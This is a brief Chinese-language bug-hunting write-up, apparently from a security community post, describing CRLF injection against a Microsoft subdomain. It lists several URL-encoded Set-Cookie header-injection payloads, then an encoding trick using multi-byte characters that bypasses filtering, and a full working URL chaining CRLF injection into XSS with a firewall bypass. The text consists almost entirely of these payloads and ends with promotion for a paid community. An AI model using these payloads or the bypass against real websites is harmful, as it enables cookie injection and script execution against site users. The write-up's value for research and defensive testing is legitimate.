1.让我们测试最容易被忽视的漏洞 CRLF INJECTION
2.我尝试了一些不同的有效载荷,但我只收到“400 Bad Request”
%0D%0A%20Set-Cookie:whoami=thecyberneh
%20%0D%0ASet-Cookie:whoami=thecyberneh
%0A%20Set-Cookie:whoami=thecyberneh
%2F%2E%2E%0D%0ASet-Cookie:whoami=thecyberneh
3.我做了很少的研究,得到了一些独特的编码,称为“GBK 编码”。所以在 URL 编码之后,我制作并尝试了一个新的payload,如下所示:
https://subDomain.microsoft.com/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=thecyberneh
4.CRLF TO XSS和防火墙Bypass
ENCODING
“<” --> 嘼 --> %E5%98%BC
“>” --> 嘾 --> %E5%98%BE
https://subDomain.microsoft.com/%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
推荐阅读
星球部分精华内容推荐
其他更多精彩内容,欢迎加入我们的星球